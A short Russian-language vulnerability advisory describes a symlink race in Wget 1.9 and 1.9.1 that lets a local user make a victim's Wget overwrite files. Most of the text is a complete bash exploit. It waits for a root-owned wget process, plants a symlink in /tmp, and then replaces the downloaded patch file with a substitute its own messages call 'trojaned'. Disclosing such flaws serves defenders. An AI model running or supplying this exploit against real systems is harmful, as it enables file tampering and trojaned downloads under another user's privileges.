Программа: Wget 1.9, 1.9.1 

Уязвимость доступа к файлам обнаружена в Wget. Локальный пользователь может заставить целевую систему пользователя Wget приложения создать или перезаписать файлы. 

Если wget загружает имя файла, которое уже существует, то приложение запишет в другое имя файла. В результате локальный пользователь может создать символьную ссылку из критического файла на системе к одному из файлов, который предположительно будет использоваться Wget. Затем, когда целевой пользователь попытается загрузить файл, который уже существует и Wget выберет измененное имя файла, ссылающийся файл будет перезаписан с привилегиями текущего пользователя. 

Эксплоит: 

#!/bin/bash

rm -f salida.txt pid.txt *.wget /tmp/patch-2.4.26.bz2
echo «1»>salida.txt
a=`cat salida.txt`
echo «Waiting for Wget execution…»

while [ «$a» == 1 ]
do
ps auxw|grep wget|grep patch-2.4.26.bz2>>salida.txt
a=`cat salida.txt`
done

echo «Process catched!»
pgrep -u root wget>pid.txt
ln -s /dev/null /tmp/patch-2.4.26.bz2
echo «/dev/null link created!»
echo «Waiting for downloading to finish…»

b=`pgrep -u root wget`
touch $b.wget
c=1
while [ «$c» == 1 ]
do
if [ -e .wget ]
then
c=0
echo «Downloading finished! Let’s delete the original file, and put
our trojaned file :-)»
rm -f /tmp/patch-2.4.26.bz2
echo «Surprise!»>/tmp/patch-2.4.26.bz2
echo «Does it worked?»

ls -la /tmp/patch-2.4.26.bz2

else
b=`pgrep -u root wget`
touch $b.wget

fi

done



Оставить мнение